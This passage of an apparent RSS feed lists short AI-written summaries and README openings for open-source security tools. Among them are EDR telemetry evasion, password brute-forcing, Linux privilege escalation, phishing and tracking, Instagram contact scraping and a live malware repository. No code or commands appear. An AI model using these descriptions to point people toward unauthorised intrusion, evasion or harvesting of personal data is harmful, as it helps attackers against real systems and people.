&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Telemetry Sourcerer is a tool designed for red teamers and security researchers to enumerate and disable various sources of telemetry utilized by antivirus and endpoint detection and response (EDR) systems on Windows. It features the ability to suppress kernel-mode callbacks, unhook inline user-mode hooks, and identify relevant Event Tracing for Windows (ETW) sessions, making it instrumental in identifying blind spots and validating evasion techniques within lab environments. However, it is primarily for research applications and carries OPSEC risks if deployed in production settings.&lt;/p&gt;</description></item><item><title>Template</title><link>https://rainmana.github.io/hackyfeed/tools/1n7erface-template/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/1n7erface-template/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Template is a heuristic internal network scanning tool designed for security assessments and vulnerability detection. It features a producer-consumer model for efficient data handling, employs heuristic scanning methods to minimize packet sending, and includes robust web fingerprinting capabilities with over 900 fingerprints. Additionally, it supports extreme concurrency in its modules, optimizing performance during scans and brute force attacks.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="template---启发式内网扫描"&gt;Template - 启发式内网扫描&lt;/h1&gt;
&lt;p&gt;&lt;img src="https://img.shields.io/github/stars/1n7erface/Template?color=success" alt="GitHub Repo stars"&gt;
&lt;img src="https://img.shields.io/github/forks/1n7erface/Template" alt="GitHub forks"&gt;
&lt;img src="https://img.shields.io/github/downloads/1n7erface/Template/total?color=blueviolet" alt="GitHub all release"&gt;
&lt;img src="https://img.shields.io/badge/KCon-%E5%85%B5%E5%99%A8%E8%B0%B1-red" alt=""&gt;&lt;/p&gt;</description></item><item><title>tenet</title><link>https://rainmana.github.io/hackyfeed/tools/gaasedelen-tenet/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/gaasedelen-tenet/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Tenet is an IDA Pro plugin designed for exploring execution traces of binaries, facilitating a more intuitive navigation of complex execution patterns. It supports bidirectional exploration of traces with visual representation of execution flow, along with features for zooming and setting breakpoints on instructions and memory. This tool is particularly useful for reverse engineers aiming to analyze program behavior and execution contexts in a detailed manner.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="tenet---a-trace-explorer-for-reverse-engineers"&gt;Tenet - A Trace Explorer for Reverse Engineers&lt;/h1&gt;
&lt;p align="center"&gt;
&lt;img alt="Tenet Trace Explorer" src="screenshots/tenet_overview.gif"/&gt;
&lt;/p&gt;</description></item><item><title>TermuxCyberArmy</title><link>https://rainmana.github.io/hackyfeed/tools/err0r-ica-termuxcyberarmy/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/err0r-ica-termuxcyberarmy/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; TermuxCyberArmy is a cybersecurity toolkit designed for Termux, primarily facilitating various hacking and scripting tasks. Notable features include compatibility with multiple Linux distributions such as Kali Linux and Parrot OS, as well as ease of installation using basic command-line operations. The tool is particularly suited for security practitioners seeking to enhance their skills in penetration testing and ethical hacking.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;p&gt;&lt;img src="https://i.postimg.cc/xCkjVwLD/OIG3-t8bf-O0ft.jpg" alt="logo"&gt;&lt;/p&gt;
&lt;h2 id="update-19062024"&gt;Update 19/06/2024&lt;/h2&gt;
&lt;p&gt;Login form has been removed&lt;/p&gt;</description></item><item><title>terracognita</title><link>https://rainmana.github.io/hackyfeed/tools/cycloidio-terracognita/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/cycloidio-terracognita/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Terracognita is a tool that automates the import of existing cloud infrastructure into Terraform configurations (HCL) or Terraform state, particularly supporting AWS, GCP, Azure, and VMware. It streamlines the adoption of Infrastructure as Code (IaC) best practices by generating Terraform code from current cloud setups, enabling easier lifecycle management and integration with Cycloid&amp;rsquo;s DevOps pipelines. Notable features include support for multiple major cloud providers and an open-source nature that encourages community contributions.&lt;/p&gt;</description></item><item><title>terraform-aws-secure-baseline</title><link>https://rainmana.github.io/hackyfeed/tools/nozaq-terraform-aws-secure-baseline/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/nozaq-terraform-aws-secure-baseline/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The terraform-aws-secure-baseline module automates the establishment of a secure configuration baseline for AWS accounts, adhering to recognized security benchmarks such as CIS AWS Foundations and AWS Foundational Security Best Practices. Key features include enhanced Identity and Access Management through IAM policies and roles, comprehensive logging and monitoring via AWS CloudTrail and CloudWatch, and secure networking configurations that limit exposure and enforce best practices. This module is integral for organizations seeking to enhance their security posture in AWS by simplifying compliance with security standards.&lt;/p&gt;</description></item><item><title>Terrapin-Scanner</title><link>https://rainmana.github.io/hackyfeed/tools/rub-nds-terrapin-scanner/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/rub-nds-terrapin-scanner/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The Terrapin Vulnerability Scanner is a Go-based utility designed to assess the vulnerability of SSH clients and servers against the Terrapin Attack. It utilizes a single connection to retrieve supported algorithms without initiating a full SSH key exchange, allowing it to identify potential vulnerabilities and support for known countermeasures like strict key exchange. Notable features include JSON output for results, support for various operating systems via pre-compiled binaries and Docker, and ease of building from source.&lt;/p&gt;</description></item><item><title>Textractor</title><link>https://rainmana.github.io/hackyfeed/tools/artikash-textractor/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/artikash-textractor/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Textractor is an open-source text hooking tool designed for x86/x64 video games on Windows and Wine, enabling users to extract in-game text for translation or accessibility purposes. It features automatic hooking for multiple game engines, extensive customization options, and support for AGTH hook codes, making it adaptable for varied gaming environments. The tool also allows for the development of custom extensions, enhancing its functionality and user experience.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="textractor"&gt;Textractor&lt;/h1&gt;
&lt;p&gt;&lt;img src="screenshot.png" alt="How it looks"&gt;&lt;/p&gt;</description></item><item><title>THC-Archive</title><link>https://rainmana.github.io/hackyfeed/tools/hackerschoice-thc-archive/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/hackerschoice-thc-archive/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; THC-Archive is a repository that consolidates all releases from The Hacker&amp;rsquo;s Choice, a prominent security research group. This collection serves as a backup for their work, ensuring that projects are preserved despite the lack of a full web server. Notable active projects include THC-Hydra, THC-IPv6, and utilities aimed at various hacking and security tasks.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="thc-archive"&gt;THC-Archive&lt;/h1&gt;
&lt;p&gt;All releases of the security research group (a.k.a. hackers) The Hacker&amp;rsquo;s Choice&lt;/p&gt;</description></item><item><title>thc-hydra</title><link>https://rainmana.github.io/hackyfeed/tools/vanhauser-thc-thc-hydra/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/vanhauser-thc-thc-hydra/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; THC-Hydra is a versatile password-cracking tool designed for testing the security of various network services by attempting to gain unauthorized access through brute-force attacks. It supports multiple protocols, including FTP, HTTP, SSH, and many others, enabling security researchers and consultants to evaluate password strength and recognize vulnerabilities across a wide range of applications. Notable features include its ability to conduct parallelized connection attempts and an extensible module engine for easy addition of new protocols.&lt;/p&gt;</description></item><item><title>The_Holy_Book_of_X86</title><link>https://rainmana.github.io/hackyfeed/tools/captainarash-the_holy_book_of_x86/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/captainarash-the_holy_book_of_x86/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The Holy Book of X86 is a comprehensive guide focused on x86 architecture, assembly language, and operating system internals, aimed at enhancing the reader&amp;rsquo;s understanding of computer systems. It features a crash course in x86 assembly and covers essential topics such as memory management, paging, segmentation, and interrupts, making it suitable for learners and practitioners in systems programming and reverse engineering. Notably, the repository includes practical examples and applications in pure assembly, aiding in the development of foundational skills in low-level programming.&lt;/p&gt;</description></item><item><title>theHarvester</title><link>https://rainmana.github.io/hackyfeed/tools/laramies-theharvester/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/laramies-theharvester/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; theHarvester is a reconnaissance tool designed for red team assessments and penetration tests, facilitating the gathering of open-source intelligence (OSINT). It collects various types of data such as names, emails, IP addresses, subdomains, and URLs from multiple public sources, enhancing a security professional&amp;rsquo;s understanding of a domain&amp;rsquo;s external threat landscape. Notable features include support for numerous passive modules that query different search engines and databases, enabling comprehensive domain analysis and threat enumeration.&lt;/p&gt;</description></item><item><title>theZoo</title><link>https://rainmana.github.io/hackyfeed/tools/ytisf-thezoo/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/ytisf-thezoo/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; theZoo is a live malware repository designed to facilitate malware analysis by providing a comprehensive collection of malware samples and source code for educational and research purposes. It enables users to safely analyze malware behavior in isolated environments, with guidance on precautions for running potentially dangerous samples. Notable features include a user-friendly setup through a Python-based command-line interface and organized access to various malware types for in-depth research.&lt;/p&gt;</description></item><item><title>thorium</title><link>https://rainmana.github.io/hackyfeed/tools/cisagov-thorium/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/cisagov-thorium/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Thorium is a scalable file analysis and data generation platform designed to orchestrate various docker, VM, or shell tools at scale. Its primary use case is to facilitate the analysis of arbitrary files and repositories, while featuring easy tool import capabilities, static and dynamic analysis sandboxes, a RESTful API, and multi-tenant support for permission management. Additionally, Thorium supports comprehensive search functionalities and includes a wide array of pre-integrated analysis tools, making it suitable for both individual developers and collaborative analytics environments.&lt;/p&gt;</description></item><item><title>thug</title><link>https://rainmana.github.io/hackyfeed/tools/buffer-thug/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/buffer-thug/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Thug is a low-interaction honeyclient developed in Python that emulates the behavior of a web browser to detect and analyze client-side attacks by allowing malicious content to exploit its simulated environment. Its primary use case is research and detection of vulnerabilities in client applications, akin to a honeypot but focused on the client side. Notable features include its ability to mimic user interactions and support for detailed analysis of malicious payloads in a controlled setting.&lt;/p&gt;</description></item><item><title>TIDoS-Framework</title><link>https://rainmana.github.io/hackyfeed/tools/0xinfection-tidos-framework/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/0xinfection-tidos-framework/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; TIDoS is an advanced offensive web application penetration testing framework designed to facilitate comprehensive security assessments by automating tasks across multiple phases, including reconnaissance, scanning, and vulnerability analysis. With over 100 modules and features such as multiprocessing for performance enhancement, a Metasploit-like console interface, and a graphical user interface, TIDoS streamlines the penetration testing process, enabling users to conduct efficient and thorough web application security assessments with minimal configuration. Additional capabilities like Tor integration further enhance anonymity during testing efforts.&lt;/p&gt;</description></item><item><title>Tigress_protection</title><link>https://rainmana.github.io/hackyfeed/tools/jonathansalwan-tigress_protection/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/jonathansalwan-tigress_protection/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Tigress is a virtualizer and obfuscator for the C programming language that provides extensive defenses against both static and dynamic reverse engineering through advanced code transformation techniques. Its notable features include the generation of diverse virtual instruction sets, embedding of bogus functions, the application of anti de-virtualization measures, and support for continuous runtime code modification. The tool is particularly designed for security researchers looking to protect code integrity and for those involved in code analysis challenges requiring the deobfuscation of protected binaries.&lt;/p&gt;</description></item><item><title>TiltedEvolution</title><link>https://rainmana.github.io/hackyfeed/tools/tiltedphoques-tiltedevolution/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/tiltedphoques-tiltedevolution/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Tilted Online is a framework designed to facilitate multiplayer gameplay in Bethesda&amp;rsquo;s Skyrim Special Edition. It provides essential components such as game client sources, an immersive launcher, and server implementations, all structured to enhance the multiplayer experience. Notable features include a modular architecture for client-server interactions and community-driven development, allowing contributors with C++ experience to actively participate.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="tilted-online"&gt;Tilted Online&lt;/h1&gt;
&lt;p&gt;&lt;img src="https://github.com/tiltedphoques/TiltedEvolution/workflows/Build%20windows/badge.svg?branch=master" alt="Build status"&gt; &lt;a href="https://github.com/tiltedphoques/TiltedEvolution/actions/workflows/linux.yml"&gt;&lt;img src="https://github.com/tiltedphoques/TiltedEvolution/actions/workflows/linux.yml/badge.svg" alt="Build linux"&gt;&lt;/a&gt; &lt;a href="https://discord.gg/skyrimtogether"&gt;&lt;img src="https://img.shields.io/discord/247835175860305931.svg?label=&amp;amp;logo=discord&amp;amp;logoColor=ffffff&amp;amp;color=7389D8&amp;amp;labelColor=6A7EC2" alt="Discord"&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;img src="https://avatars.githubusercontent.com/u/52131158?s=200&amp;v=4" align="right"
alt="Size Limit logo by Anton Lovchikov" width="110" height="100"&gt;&lt;/p&gt;</description></item><item><title>tinfoleak</title><link>https://rainmana.github.io/hackyfeed/tools/vaguileradiaz-tinfoleak/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/vaguileradiaz-tinfoleak/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; tinfoleak is an open-source tool designed for Twitter intelligence analysis, enabling automated extraction and analysis of data based on user identifiers, geographic coordinates, or keywords. It provides comprehensive insights into user activities, account relations, geolocation data, and engagement metrics, making it a valuable resource for intelligence analysts. Notable features include ability to analyze text and media, track user interactions, and monitor digital identities across social networks.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="tinfoleak"&gt;tinfoleak&lt;/h1&gt;
&lt;p&gt;The most complete open-source tool for Twitter intelligence analysis&lt;/p&gt;</description></item><item><title>tiny_tracer</title><link>https://rainmana.github.io/hackyfeed/tools/hasherezade-tiny_tracer/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/hasherezade-tiny_tracer/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Tiny Tracer is a binary instrumentation tool designed for tracing API calls, defined local functions, selected instructions, and inline system calls, while also evading various anti-debug and anti-VM techniques. It generates detailed reports in a .tag format, which can be utilized by other analysis tools, facilitating deeper insights into a program&amp;rsquo;s execution flow. The tool is primarily aimed at security researchers and analysts who need to examine malicious binaries or analyze software behavior in a controlled environment.&lt;/p&gt;</description></item><item><title>tlosint-live</title><link>https://rainmana.github.io/hackyfeed/tools/tracelabs-tlosint-live/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/tracelabs-tlosint-live/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The tlosint-live repository provides a custom build configuration for a Kali Linux-based OSINT distribution tailored for Trace Labs. Its primary use case is to streamline the creation of a live OSINT environment, featuring a set of pre-configured tools and applications for data analysis, domain reconnaissance, and social media investigations. Notable features include an easily modifiable package list, integration of various OSINT tools, and the capability to generate a bootable ISO or OVA file for virtual environments.&lt;/p&gt;</description></item><item><title>tookie-osint</title><link>https://rainmana.github.io/hackyfeed/tools/alfredredbird-tookie-osint/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/alfredredbird-tookie-osint/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Tookie-OSINT is an open-source tool designed for username discovery across multiple online platforms, offering a straightforward user interface for ease of use. It aims to facilitate operational security and intelligence gathering for new programmers and penetration testers, achieving an approximately 80% success rate in finding user accounts. Notable features include full reimplementation for enhanced performance and multilingual support.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;p&gt;&lt;img src="https://github.com/Alfredredbird/tookie-osint/assets/105014217/67bab5b4-f537-4f05-8a7b-c9fc3a16d256" alt="Tookie-osint-logo-newtext-480x480"&gt;&lt;/p&gt;
&lt;p&gt;&lt;img src="https://img.shields.io/github/contributors/alfredredbird/tookie-osint" alt="GitHub contributors"&gt;
&lt;img src="https://img.shields.io/github/languages/code-size/alfredredbird/tookie-osint" alt="GitHub code size in bytes"&gt;
&lt;img src="https://img.shields.io/github/forks/alfredredbird/tookie-osint?logoColor=ffff&amp;amp;color=%23ff0000" alt="GitHub forks"&gt;
&lt;img src="https://img.shields.io/github/stars/alfredredbird/tookie-osint?color=%2332cd32" alt="GitHub Repo stars"&gt;
&lt;a href="https://github.com/psf/black"&gt;&lt;img src="https://img.shields.io/badge/code%20style-black-000000.svg" alt="Code style: black"&gt;&lt;/a&gt;&lt;/p&gt;</description></item><item><title>toolkit</title><link>https://rainmana.github.io/hackyfeed/tools/indetectables-net-toolkit/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/indetectables-net-toolkit/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Indetectables Toolkit is a comprehensive suite designed for malware analysts and cybersecurity professionals, offering a wide range of 101 tools for various tasks. Key features include automated updates via a Universal Updater, easy extensibility for adding new tools, and integration with Windows context menus for enhanced usability. The toolkit aims to streamline the workflow for both novice and experienced users while providing reliable and curated resources for cybersecurity operations.&lt;/p&gt;</description></item><item><title>TOP</title><link>https://rainmana.github.io/hackyfeed/tools/ghosttroops-top/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/ghosttroops-top/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; TOP is a vulnerability cataloging tool designed for bug bounty hunters and penetration testers, focusing on proof-of-concept (PoC) exploits for various Common Vulnerabilities and Exposures (CVEs) from recent years. It compiles a list of notable CVEs along with their respective exploits and corresponding GitHub repositories, thereby facilitating ease of access and research for security professionals. Key features include organized yearly summaries of significant vulnerabilities, making it an essential resource for monitoring and exploiting security weaknesses.&lt;/p&gt;</description></item><item><title>top25-parameter</title><link>https://rainmana.github.io/hackyfeed/tools/lutfumertceylan-top25-parameter/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/lutfumertceylan-top25-parameter/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The &amp;ldquo;top25-parameter&amp;rdquo; repository provides a curated list of the 25 most commonly vulnerable parameters associated with various web security vulnerabilities, including Cross-Site Scripting (XSS), SQL Injection (SQLi), and Server-Side Request Forgery (SSRF). It is intended for use in both manual reconnaissance and automation tools, supported by data sourced from OSINT and articles in the cybersecurity community. Notable features include organized parameters for different vulnerabilities, aiding security researchers and practitioners in identifying and mitigating risks effectively.&lt;/p&gt;</description></item><item><title>TorBot</title><link>https://rainmana.github.io/hackyfeed/tools/dedsecinside-torbot/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/dedsecinside-torbot/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; TorBot is an open-source intelligence tool designed for crawling and gathering data from .onion websites on the dark web. Its primary use case involves extracting page titles, saving links in a database, and visualizing link relationships, facilitating user insights into dark web resources. Notable features include the ability to check link status, customize crawling depth, and output results in various formats such as JSON and HTML.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
 &lt;pre&gt;

 ████████╗ ██████╗ ██████╗ ██████╗ ██████╗ ████████╗
 ╚══██╔══╝██╔═══██╗██╔══██╗ ██╔══██╗██╔═████╗╚══██╔══╝
 ██║ ██║ ██║██████╔╝ ██████╔╝██║██╔██║ ██║
 ██║ ██║ ██║██╔══██╗ ██╔══██╗████╔╝██║ ██║
 ██║ ╚██████╔╝██║ ██║ ██████╔╝╚██████╔╝ ██║
 ╚═╝ ╚═════╝ ╚═╝ ╚═╝ ╚═════╝ ╚═════╝ ╚═╝

 Open Source Intelligence Tool for the Dark Web

&lt;/pre&gt;
&lt;p align="center"&gt;
 &lt;a href="https://owasp.org/www-project-torbot/"&gt;
 &lt;img src="https://user-images.githubusercontent.com/4481429/94645022-65f35680-0308-11eb-8dce-a4ceba8db660.png" width="270" title="OWASP Foundation"&gt;
 &lt;/a&gt;
 &lt;img src="https://github.com/DedSecInside/TorBot/assets/4481429/41f5e7ea-56fe-41b0-bd26-2788deeb5f10" width="250" title="Hacktoberfest 2022"&gt;
 &lt;img src="https://user-images.githubusercontent.com/4481429/94646312-9dafcd80-030b-11eb-9824-73aa2414cf58.png" width="160" title="OpenSource"&gt;
&lt;/p&gt;</description></item><item><title>toutatis</title><link>https://rainmana.github.io/hackyfeed/tools/megadose-toutatis/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/megadose-toutatis/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Toutatis is a Python-based tool designed for extracting detailed information from Instagram accounts, such as emails, phone numbers, and user statistics. Its primary use case is to facilitate data retrieval for user analysis or account verification, utilizing either a username or an Instagram ID. Notable features include the ability to access both public and obfuscated contact details, alongside comprehensive profile metrics.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="toutatis"&gt;Toutatis&lt;/h1&gt;
&lt;p&gt;👋 Hi there! For any professional inquiries or collaborations, please reach out to me at:
&lt;a href="mailto:megadose@protonmail.com"&gt;megadose@protonmail.com&lt;/a&gt;&lt;/p&gt;</description></item><item><title>TRADFRI-Hacking</title><link>https://rainmana.github.io/hackyfeed/tools/basilfx-tradfri-hacking/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/basilfx-tradfri-hacking/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; TRADFRI-Hacking is a project designed to facilitate the reverse engineering and customization of IKEA&amp;rsquo;s TRÅDFRI home automation products, which utilize Zigbee technology. It offers detailed resources for product teardowns, firmware manipulation, and the creation of custom hardware solutions using the TRÅDFRI modules, including tools for firmware dumping and development. Notable features include an extensive documentation of various TRÅDFRI products, customizable firmware options, and insights into hardware modifications, empowering developers to repurpose and enhance these smart home devices.&lt;/p&gt;</description></item><item><title>traitor</title><link>https://rainmana.github.io/hackyfeed/tools/liamg-traitor/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/liamg-traitor/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Traitor is a privilege escalation tool designed to automatically exploit local vulnerabilities and misconfigurations in Unix-like systems to achieve a root shell. It incorporates various methods from GTFOBins and specific CVEs, allowing users to discover potential exploits with options to directly attempt them if necessary. Notable features include the ability to analyze sudo permissions, the option to exploit specific vulnerabilities, and support for various privilege escalation vectors.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="traitor"&gt;Traitor&lt;/h1&gt;
&lt;p&gt;Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy!&lt;/p&gt;</description></item><item><title>trape</title><link>https://rainmana.github.io/hackyfeed/tools/jofpin-trape/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/jofpin-trape/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Trape is an OSINT analysis tool designed for real-time tracking and execution of social engineering attacks, primarily aimed at assisting government organizations, companies, and researchers in identifying cybercriminals. Key features include precise locator optimization, a REST API for remote website monitoring, and capabilities for executing phishing attacks, managing JavaScript injections, and analyzing target network information. The tool emphasizes stealth and user control, allowing for sophisticated manipulation of browser behavior to extract sensitive information covertly.&lt;/p&gt;</description></item><item><title>tripwire-open-source</title><link>https://rainmana.github.io/hackyfeed/tools/tripwire-tripwire-open-source/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/tripwire-tripwire-open-source/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Open Source Tripwire® is a file integrity monitoring tool designed to detect and alert users about unauthorized changes to files and directories by comparing the current filesystem state against a predefined baseline. It features a highly configurable policy file system for specifying which attributes to monitor, the capability to sign configuration and report files for added security, and the ability to generate and manage cryptographic keys for multiple machines. Users can utilize it to establish secure baselines and automate periodic checks, enhancing overall system integrity and security.&lt;/p&gt;</description></item><item><title>Triton</title><link>https://rainmana.github.io/hackyfeed/tools/jonathansalwan-triton/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/jonathansalwan-triton/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Triton is a dynamic binary analysis library designed for building program analysis tools, enabling automated reverse engineering and software verification. It supports dynamic symbolic execution and taint analysis across multiple architectures including x86, ARM, and RISC-V, and features a powerful API in both C++ and Python, as well as capabilities for expression synthesis, SMT solver integration, and LLVM lifting.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;p align="center"&gt;&lt;img width="50%" src="https://triton-library.github.io/files/triton2.png"/&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Triton&lt;/strong&gt; is a dynamic binary analysis library. It provides internal components that allow you to build your program analysis tools,
automate reverse engineering, perform software verification or just emulate code.&lt;/p&gt;</description></item><item><title>trivy-operator</title><link>https://rainmana.github.io/hackyfeed/tools/aquasecurity-trivy-operator/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/aquasecurity-trivy-operator/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The Trivy Operator is a Kubernetes-native security toolkit that utilizes Trivy to perform continuous security scans of Kubernetes clusters. It automatically generates and updates comprehensive security reports, including vulnerability assessments, configuration audits, and compliance checks, which are accessible through the Kubernetes API. Notable features include automated scans for workloads, RBAC assessments, secret exposure detection, and generation of Software Bill of Materials (SBOM) for workloads, aiding in the identification and mitigation of potential security risks in real-time.&lt;/p&gt;</description></item><item><title>TRX</title><link>https://rainmana.github.io/hackyfeed/tools/lostartefacts-trx/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/lostartefacts-trx/</guid><description>&lt;blockquote&gt;
